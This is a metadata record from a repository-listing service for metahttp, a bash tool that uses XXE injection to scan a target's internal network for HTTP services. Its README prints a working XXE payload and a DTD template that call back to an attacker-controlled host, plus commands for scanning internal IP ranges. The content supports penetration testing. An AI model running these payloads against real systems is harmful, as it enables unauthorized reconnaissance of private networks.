{"id":13542289,"url":"https://github.com/vp777/metahttp","last_synced_at":"2025-04-02T09:33:32.512Z","repository":{"id":201407016,"uuid":"317038496","full_name":"vp777/metahttp","owner":"vp777","description":"A bash script that automates the scanning of a target network for HTTP resources through XXE","archived":false,"fork":false,"pushed_at":"2020-12-02T10:04:14.000Z","size":84,"stargazers_count":37,"open_issues_count":0,"forks_count":8,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-11-03T07:33:14.428Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/vp777.png","metadata":{"files":{"readme":"Readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2020-11-29T20:37:17.000Z","updated_at":"2022-05-11T17:27:59.000Z","dependencies_parsed_at":null,"dependency_job_id":"8a910e00-3e0b-4173-9d56-80e1d2ea572a","html_url":"https://github.com/vp777/metahttp","commit_stats":null,"previous_names":["vp777/metahttp"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vp777%2Fmetahttp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vp777%2Fmetahttp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vp777%2Fmetahttp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vp777%2Fmetahttp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vp777","download_url":"https://codeload.github.com/vp777/metahttp/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246789354,"owners_count":20834279,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T10:01:04.121Z","updated_at":"2025-04-02T09:33:32.186Z","avatar_url":"https://github.com/vp777.png","language":"Shell","funding_links":[],"categories":["Exploitation","Shell"],"sub_categories":["XXE Injection"],"readme":"# metahttp\r\n\r\nA bash script that automates the scanning of a target network for HTTP resources through XXE\r\n\r\n\u003cp align=\"center\"\u003e\r\n  \u003cimg width=\"680\" src=\"img/meta.gif\"/\u003e\r\n\u003c/p\u003e\r\n\r\n## How it works\r\n\r\nInitially, the attacker triggers the XXE to have the target application load the DTDs from the server hosted by metahttp.\r\n\r\nThis can be done for example by having the victim application parse the following XML document:\r\n```xml\r\n\u003c!DOCTYPE r SYSTEM \"http://attacker_host:8080/serveme.dtd\"\u003e\u003cr\u003e\u003c/r\u003e\r\n```\r\n\r\nmetahttp receives the request and responds with the following template DTD:\r\n```xml\r\n\u003c!ENTITY % test_target SYSTEM '${target_protocol}://${target_ip}:${target_port}${target_path}'\u003e\r\n\u003c!ENTITY % callback SYSTEM 'http://${server_hostname}:${http_callback_port}/${callback_path_prefix}${target_ip}_${target_port}'\u003e\r\n\u003c!ENTITY % trigger '%test_target;%callback;'\u003e\r\n%trigger;\r\n```\r\n\r\nAfter receiving the DTD, the XML parser will attempt to substitute the `trigger` parameter entity with its value.\r\nThe `trigger` parameter entity includes both `test_target` and `callback`. Now here we rely on the fact that XML parsers will normally process the parameter entities one by one. In case the substitution of an entity fails, they will not proceed with the substitution of the subsequent entities. So now, if we receive a callback to our server, it means that the substitution of the `callback` parameter entity was initiated which with its turn means that the resource pointed by the `test_target` exists.\r\n\r\nThe above procedure is repeated for all the provided hosts/ports. Since there might be a big number of hosts/ports combinations, the step where the attacker has to trigger the XXE on the target server is automated  through the use of the \"dispatcher\". The dispatcher is an executable passed to metahttp through the -x option and is responsible for triggering the XXE on the target server. Couple of examples are provided in the dispatcher_examples folder.\r\n\r\n## Usage\r\n1. Local testing with a Java app on docker:\r\n```bash\r\n./metahttp.sh -T \u003c(echo dockerhost) -p 80 -x ./dispatcher_examples/docker_java.sh -a /\r\n```\r\n\r\n2. Scanning the internal network of a target for a server hosting the resource /path/unique/to/a/service:\r\n```bash\r\n./metahttp.sh -t 10.10.0.0/24,10.20.0.0-10.20.0.15 -p 80,8000-8080,8983 -x ./dispatcher_examples/target_curl.sh -a /path/unique/to/a/service\r\n```\r\n\r\n3. More information on the options\r\n```bash\r\n./metahttp.sh --help\r\n```\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvp777%2Fmetahttp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvp777%2Fmetahttp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvp777%2Fmetahttp/lists"}